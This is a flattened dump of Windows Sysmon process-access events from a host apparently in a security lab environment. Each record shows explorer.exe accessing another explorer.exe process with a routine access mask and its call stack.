22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 